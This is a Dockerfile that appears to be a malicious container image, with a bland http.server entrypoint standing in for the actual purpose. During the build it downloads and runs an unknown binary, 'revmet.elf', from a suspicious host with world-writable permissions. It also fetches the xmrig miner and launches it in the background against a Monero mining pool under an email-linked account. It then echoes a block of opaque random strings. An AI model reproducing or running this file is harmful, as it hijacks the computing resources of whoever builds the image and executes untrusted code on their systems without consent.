FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo GUPMGogdCGdL4GsPjkdGMrXMfJtqdaaF AAkZfFimbE1VJ4N6rtYVyQilJcoqXM9M 7cVlZWqMKXXSOVl7l4nGy0hT2ss5qVcN uqaKAACHTQCPbjlXE31UO7MfaKvSEEty OXP86ZRIrmrWy1ryPHxK8rFMLhlb0AaK vPAXATZX6SibXPyXjqRVCNFHgHJbZqOL azOi2CoKkHHuK6ODFLIqD47tQqxD3xR3 HmuPegqcgtMo0wrUlqXvKDYNEUky4Ru7 aHAtQP7kZQUqIuC9fymXy3Yq66Kr898f 2p1P1mmiSAQKz8D3dG4tEwmQRbXlVT8S U1a4jYw0BHihv2pTr7iazbd2GrKe41av DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]